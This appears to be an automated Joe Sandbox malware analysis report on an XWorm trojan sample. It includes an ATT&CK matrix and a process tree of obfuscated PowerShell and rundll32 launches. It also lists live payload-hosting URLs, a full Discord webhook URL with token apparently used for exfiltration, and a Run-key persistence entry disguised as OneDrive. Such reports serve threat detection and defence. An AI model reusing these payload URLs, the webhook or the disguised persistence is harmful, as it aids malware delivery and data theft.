| Gather Victim Identity Information | Acquire Infrastructure | 1 Spearphishing Link | 111 Windows Management Instrumentation | 11 Registry Run Keys / Startup Folder | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 111 Security Software Discovery | Remote Services | 1 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 11 Registry Run Keys / Startup Folder | 131 Virtualization/Sandbox Evasion | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | 2 PowerShell | Logon Script (Windows) | 1 DLL Side-Loading | 11 Process Injection | Security Account Manager | 131 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Deobfuscate/Decode Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Obfuscated Files or Information | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | 15 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Regsvr32 | Cached Domain Credentials | 12 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Rundll32 | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
Behavior Graph ID: 1534112 | Sample: HQsitBLlOv.exe | Start date: 15/10/2024 | Architecture: WINDOWS | Score: 100

Process tree reconstructed from the behavior graph. Parenthesized numbers are graph node IDs; bracketed numbers are the counters the graph shows beside a process (created files / registry values, see legend).

  • Start (2): contacts pastebin.com (68), raw.githubusercontent.com (70) and 2 other IPs or domains (72); pastebin.com (68) is flagged "Connects to a pastebin service (likely for C&C)" (92)
      • Signatures: Suricata IDS alerts for network traffic (86); Malicious sample detected (through community Yara rule) (88); Multi AV Scanner detection for submitted file (90); 3 other signatures (94)
      • Started: loaddll64.exe [1] (10), forfiles.exe [1] (13), forfiles.exe [1] (15)
  • loaddll64.exe (10): Obfuscated command line found (108); started rundll32.exe (17), regsvr32.exe (20), cmd.exe [1] (22), 2 other processes (32)
  • forfiles.exe (13): Suspicious powershell command line found (110); started powershell.exe [7] (24), conhost.exe [1] (26)
  • forfiles.exe (15): started powershell.exe (28), conhost.exe [1] (30)
  • rundll32.exe (17): Obfuscated command line found (82); started powershell.exe [14 18] (35)
  • regsvr32.exe (20): started powershell.exe (40)
  • cmd.exe (22): started rundll32.exe (42)
  • powershell.exe (24): Suspicious powershell command line found (84); started powershell.exe [13] (44)
  • powershell.exe (28): started powershell.exe (46)
  • 2 other processes (32): contact discord.com 162.159.136.232, 443, 49832, 49888 CLOUDFLARENETUS United States (66)
  • powershell.exe (35): contacts raw.githubusercontent.com 185.199.109.133, 443, 49742, 49743 FASTLYUS Netherlands (74); dropped C:\ProgramData\...\BeginSync.lnk, MS (64); signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) (96), Suspicious powershell command line found (98), Uses cmd line tools excessively to alter registry or file data (100), 2 other signatures (104); started conhost.exe (48), attrib.exe [1] (50)
  • powershell.exe (40): contacts pastebin.com 104.20.4.235, 443, 49733, 49734 CLOUDFLARENETUS United States (76); started conhost.exe (52), attrib.exe [1] (54)
  • rundll32.exe (42): Obfuscated command line found (102); started powershell.exe (56)
  • powershell.exe (44): contacts 172.67.19.24, 443, 49881, 49885 CLOUDFLARENETUS United States (78)
  • powershell.exe (56): contacts tinyurl.com 104.17.112.233, 49727, 49728, 49729 CLOUDFLARENETUS United States (80); Uses cmd line tools excessively to alter registry or file data (106); started conhost.exe (60), attrib.exe [1] (62)

| Source | Detection | Scanner | Label |
|---|---|---|---|
| HQsitBLlOv.dll | 42% | ReversingLabs | Win64.Trojan.XWorm |
No Antivirus matches
No Antivirus matches
No Antivirus matches
| Source | Detection | Scanner | Label |
|---|---|---|---|
| http://nuget.org/NuGet.exe | 0% | URL Reputation | safe |
| http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
| https://go.micro | 0% | URL Reputation | safe |
| https://contoso.com/License | 0% | URL Reputation | safe |
| https://contoso.com/Icon | 0% | URL Reputation | safe |
| http://crl.m | 0% | URL Reputation | safe |
| https://contoso.com/ | 0% | URL Reputation | safe |
| https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
| https://aka.ms/pscore68 | 0% | URL Reputation | safe |
| http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| tinyurl.com | 104.17.112.233 | true | false | | unknown |
| discord.com | 162.159.136.232 | true | true | | unknown |
| raw.githubusercontent.com | 185.199.109.133 | true | true | | unknown |
| pastebin.com | 104.20.4.235 | true | true | | unknown |
| s-part-0032.t-0009.t-msedge.net | 13.107.246.60 | true | false | | unknown |
| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| http://tinyurl.com/yeykydun | false | | unknown |
| http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt | false | | unknown |
| https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt | false | | unknown |
| http://pastebin.com/raw/sA04Mwk2 | false | | unknown |
| https://pastebin.com/raw/sA04Mwk2 | false | | unknown |
| https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 | true | | unknown |
| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| http://nuget.org/NuGet.exe | powershell.exe, 00000006.00000002.2929908311.00000276901B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2929908311.000002769006E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2512610521.00000278AC322000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2512610521.00000278AC1DF000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://discord.com | powershell.exe, 00000006.00000002.2569213401.000002768074E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.00000227027AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B4A23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789C5B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789E1EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B88E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E66D6B000.00000004.00000800.00020000.00000000.sdmp | true | | unknown |
| https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_ | powershell.exe, 0000001C.00000002.2819493490.0000025E66490000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E6648C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E66353000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E66D6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E6646D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E66469000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E66482000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E66486000.00000004.00000800.00020000.00000000.sdmp | true | | unknown |
| http://pesterbdd.com/images/Pester.png | powershell.exe, 0000000D.00000002.2479111424.000002789C395000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQ | powershell.exe, 00000006.00000002.2569213401.0000027681730000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.0000022703735000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B59D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789D8A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B7FC3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E66490000.00000004.00000800.00020000.00000000.sdmp | true | | unknown |
| http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000000D.00000002.2479111424.000002789C395000.00000004.00000800.00020000.00000000.sdmp | false | | unknown |
| https://go.micro | powershell.exe, 00000006.00000002.2569213401.000002768089A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.00000227028F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B5423000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789D179000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B7938000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E65E63000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: safe | unknown |
| http://crl.mT | powershell.exe, 00000006.00000002.3069004081.00000276F9F1A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown |
| http://www.microsoft.co | powershell.exe, 0000001C.00000002.3255147271.0000025E7D9E0000.00000004.00000020.00020000.00000000.sdmp | false | | unknown |
| https://contoso.com/License | powershell.exe, 0000000D.00000002.2512610521.00000278AC1DF000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://contoso.com/Icon | powershell.exe, 0000000D.00000002.2512610521.00000278AC1DF000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://raw.githubusercont | powershell.exe, 00000006.00000002.2569213401.00000276816A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.0000022703675000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B5919000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789D816000.00000004.00000800.00020000.00000000.sdmp | false | | unknown |
| http://discord.com | powershell.exe, 00000006.00000002.2569213401.000002768074E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.00000227027AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B4A23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789E1EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B88E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E66D6B000.00000004.00000800.00020000.00000000.sdmp | false | | unknown |
| https://github.com/Pester/Pester | powershell.exe, 0000000D.00000002.2479111424.000002789C395000.00000004.00000800.00020000.00000000.sdmp | false | | unknown |
| http://crl.m | powershell.exe, 00000007.00000002.3055012745.000002271A54D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://discord.com/api/webhooks/128545359042878 | powershell.exe, 00000006.00000002.2569213401.000002768074E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.00000227027AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B4A23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789E1EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B88E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E66D6B000.00000004.00000800.00020000.00000000.sdmp | true | | unknown |
| https://raw.githubusercontent.com | powershell.exe, 00000006.00000002.2569213401.00000276816A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.00000227023A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.0000022703675000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B5919000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B4642000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789D816000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789C53D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B7F56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E663E2000.00000004.00000800.00020000.00000000.sdmp | false | | unknown |
| https://contoso.com/ | powershell.exe, 0000000D.00000002.2512610521.00000278AC1DF000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://nuget.org/nuget.exe | powershell.exe, 00000006.00000002.2929908311.00000276901B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2929908311.000002769006E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2512610521.00000278AC322000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2512610521.00000278AC1DF000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| http://tinyurl.com | powershell.exe, 00000006.00000002.2569213401.0000027680225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2569213401.000002768160B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2569213401.000002768129A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.00000227021F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.00000227035DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.00000227032F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B5881000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B5423000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B4495000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789D179000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789C395000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789D77A000.00000004.00000800.00020000.00000000.sdmp | false | | unknown |
| http://raw.githubusercontent.com | powershell.exe, 00000006.00000002.2569213401.00000276803D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2569213401.00000276816A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.00000227023A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.0000022703675000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B5919000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B4642000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789D816000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789C53D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B7F3A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B7F56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E663B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E663E2000.00000004.00000800.00020000.00000000.sdmp | false | | unknown |
| http://raw.githubuserconte | powershell.exe, 00000006.00000002.2569213401.00000276816A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.0000022703675000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B5919000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789D816000.00000004.00000800.00020000.00000000.sdmp | false | | unknown |
| https://raw.githubusercontent.comX | powershell.exe, 00000006.00000002.2569213401.00000276803D2000.00000004.00000800.00020000.00000000.sdmp | false | | unknown |
| https://aka.ms/pscore68 | powershell.exe, 00000006.00000002.2569213401.0000027680001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.0000022701FD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B4271000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789C171000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B748C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B7457000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E6591E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E6590B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt2 | powershell.exe, 00000007.00000002.2576842522.00000227023A3000.00000004.00000800.00020000.00000000.sdmp | false | | unknown |
| http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000006.00000002.2569213401.0000027680001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.0000022701FD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B4271000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789C171000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B7431000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E65945000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| http://pastebin.com | powershell.exe, 00000006.00000002.2569213401.000002768162C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.00000227035FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B58A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789D79B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B7E8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B7938000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B7EA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E65E63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E6631A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E66334000.00000004.00000800.00020000.00000000.sdmp | false | | unknown |
| https://pastebin.com | powershell.exe, 0000000D.00000002.2479111424.000002789D77A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B7E96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E66324000.00000004.00000800.00020000.00000000.sdmp | false | | unknown |
IP | Domain | Country | ASN | ASN Name | Malicious
162.159.136.232 | discord.com | United States | 13335 | CLOUDFLARENETUS | true
104.20.4.235 | pastebin.com | United States | 13335 | CLOUDFLARENETUS | true
172.67.19.24 | unknown | United States | 13335 | CLOUDFLARENETUS | false
185.199.109.133 | raw.githubusercontent.com | Netherlands | 54113 | FASTLYUS | true
104.17.112.233 | tinyurl.com | United States | 13335 | CLOUDFLARENETUS | false
                                                            Joe Sandbox version:41.0.0 Charoite
                                                            Analysis ID:1534112
                                                            Start date and time:2024-10-15 15:58:54 +02:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 6m 35s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:29
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:HQsitBLlOv.dll
                                                            (renamed file extension from exe to dll, renamed because original name is a hash value)
                                                            Original Sample Name:2577c0f08d1d1ad4fb18d8c980b501e002160acffa306b2d8ab1af8614521ac4.exe
                                                            Detection:MAL
                                                            Classification:mal100.troj.evad.winDLL@39/19@5/5
                                                            EGA Information:
                                                            • Successful, ratio: 100%
                                                            HCA Information:
                                                            • Successful, ratio: 92%
                                                            • Number of executed functions: 10
                                                            • Number of non-executed functions: 23
                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                            • VT rate limit hit for: HQsitBLlOv.dll
Time | Type | Description
09:59:56 | API Interceptor | 987x Sleep call for process: powershell.exe modified
09:59:57 | API Interceptor | 1x Sleep call for process: loaddll64.exe modified
16:00:14 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
16:00:22 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Match | Associated Sample Name / URL | Detection | Threat Name | Context
162.159.136.232 | S23UhdW5DH.exe | malicious | LummaC, Glupteba, SmokeLoader, Socks5Systemz, Stealc | discord.com/administrator/index.php
104.20.4.235 | OSLdZanXNc.exe | malicious | Unknown | pastebin.com/raw/sA04Mwk2
104.20.4.235 | gaber.ps1 | malicious | Unknown | pastebin.com/raw/sA04Mwk2
104.20.4.235 | cr_asm_crypter.ps1 | malicious | Unknown | pastebin.com/raw/sA04Mwk2
104.20.4.235 | sostener.vbs | malicious | Njrat | pastebin.com/raw/V9y5Q5vv
104.20.4.235 | sostener.vbs | malicious | XWorm | pastebin.com/raw/V9y5Q5vv
104.20.4.235 | envifa.vbs | malicious | Remcos | pastebin.com/raw/V9y5Q5vv
104.20.4.235 | New Voicemail Invoice 64746w .js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
104.20.4.235 | Invoice Payment N8977823.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
104.20.4.235 | Pending_Invoice_Bank_Details_XLSX.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
104.20.4.235 | Pending_Invoice_Bank_Details_kofce_.JS.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
Match | Associated Sample Name / URL | Detection | Threat Name | Context
discord.com | Lm9IJ4r9oO.exe | malicious | Unknown | 162.159.138.232
discord.com | cr_asm_hiddenz.ps1 | malicious | AsyncRAT, XWorm | 162.159.138.232
discord.com | OSLdZanXNc.exe | malicious | Unknown | 162.159.138.232
discord.com | BeginSync lnk.lnk | malicious | Unknown | 162.159.137.232
discord.com | gaber.ps1 | malicious | Unknown | 162.159.137.232
discord.com | cr_asm_crypter.ps1 | malicious | Unknown | 162.159.135.232
discord.com | steamcodegenerator.exe | malicious | Unknown | 162.159.138.232
discord.com | cr_asm.ps1 | malicious | Unknown | 162.159.138.232
discord.com | Q1KaSJ8Fom.exe | malicious | Unknown | 162.159.135.232
discord.com | Q1KaSJ8Fom.exe | malicious | Unknown | 162.159.136.232
tinyurl.com | BeginSync lnk.lnk | malicious | Unknown | 104.18.111.161
tinyurl.com | https://tinyurl.com/y9r5fvas | malicious | Unknown | 104.17.112.233
tinyurl.com | https://tinyurl.com/5xa2ubd7 | malicious | Unknown | 104.17.112.233
tinyurl.com | SecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dll | malicious | Metasploit | 104.17.112.233
tinyurl.com | SecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dll | malicious | Metasploit | 104.17.112.233
tinyurl.com | SecuriteInfo.com.Win64.MalwareX-gen.11827.5130.dll | malicious | AsyncRAT, XWorm | 104.18.111.161
tinyurl.com | balcao242609.vbs | malicious | Unknown | 104.18.111.161
tinyurl.com | https://ibafhfg.r.af.d.sendibt2.com/tr/cl/ei-iIasDUfhajlha_L_PYwmEV0TXG-pmymM0mqP6wJ8jqUBnRevpHf8umV1Cxk0P5A0G7qvQoF39O-oYwRH3RCdSdtx1Y0b_2sg_iXOax_tFc1XZBC3EPtztmZF7qOstNWb2r9nSAsjPU6qj2F8Gg64Ba0d6xBjSEwUcsnsTYaQjAxsh52QvEBY0E7yDJkW8hVMf4Z-UgTv6SrNDoDPMdYdSSvXdtLzPyBKNyGRyOKbA6kM2yCjc-39_2GjmQrGc8IG-6EqDH4Ly9S8KIsA | malicious | Unknown | 104.17.112.233
tinyurl.com | http://tinyurl.com/fresn30d39d | malicious | Unknown | 104.17.112.233
tinyurl.com | https://tinyurl.com/NDCEurope | malicious | Unknown | 104.18.111.161
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | Lm9IJ4r9oO.exe | malicious | Unknown | 162.159.138.232
CLOUDFLARENETUS | gaber_pyld.ps1 | malicious | AsyncRAT, XWorm | 172.67.19.24
CLOUDFLARENETUS | cr_asm_hiddenz.ps1 | malicious | AsyncRAT, XWorm | 162.159.138.232
CLOUDFLARENETUS | OSLdZanXNc.exe | malicious | Unknown | 162.159.138.232
CLOUDFLARENETUS | BeginSync lnk.lnk | malicious | Unknown | 104.18.111.161
CLOUDFLARENETUS | gaber.ps1 | malicious | Unknown | 162.159.137.232
CLOUDFLARENETUS | cr_asm_crypter.ps1 | malicious | Unknown | 162.159.135.232
CLOUDFLARENETUS | steamcodegenerator.exe | malicious | Unknown | 162.159.138.232
CLOUDFLARENETUS | cr_asm.ps1 | malicious | Unknown | 162.159.138.232
CLOUDFLARENETUS | HqvlYZC7Gf.exe | malicious | Unknown | 104.27.206.92
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | Lm9IJ4r9oO.exe | malicious | Unknown | 162.159.136.232, 104.20.4.235, 172.67.19.24, 185.199.109.133
3b5074b1b5d032e5620f69f9f700ff0e | gaber_pyld.ps1 | malicious | AsyncRAT, XWorm | 162.159.136.232, 104.20.4.235, 172.67.19.24, 185.199.109.133
3b5074b1b5d032e5620f69f9f700ff0e | cr_asm_hiddenz.ps1 | malicious | AsyncRAT, XWorm | 162.159.136.232, 104.20.4.235, 172.67.19.24, 185.199.109.133
3b5074b1b5d032e5620f69f9f700ff0e | OSLdZanXNc.exe | malicious | Unknown | 162.159.136.232, 104.20.4.235, 172.67.19.24, 185.199.109.133
3b5074b1b5d032e5620f69f9f700ff0e | BeginSync lnk.lnk | malicious | Unknown | 162.159.136.232, 104.20.4.235, 172.67.19.24, 185.199.109.133
3b5074b1b5d032e5620f69f9f700ff0e | gaber.ps1 | malicious | Unknown | 162.159.136.232, 104.20.4.235, 172.67.19.24, 185.199.109.133
3b5074b1b5d032e5620f69f9f700ff0e | cr_asm_crypter.ps1 | malicious | Unknown | 162.159.136.232, 104.20.4.235, 172.67.19.24, 185.199.109.133
3b5074b1b5d032e5620f69f9f700ff0e | steamcodegenerator.exe | malicious | Unknown | 162.159.136.232, 104.20.4.235, 172.67.19.24, 185.199.109.133
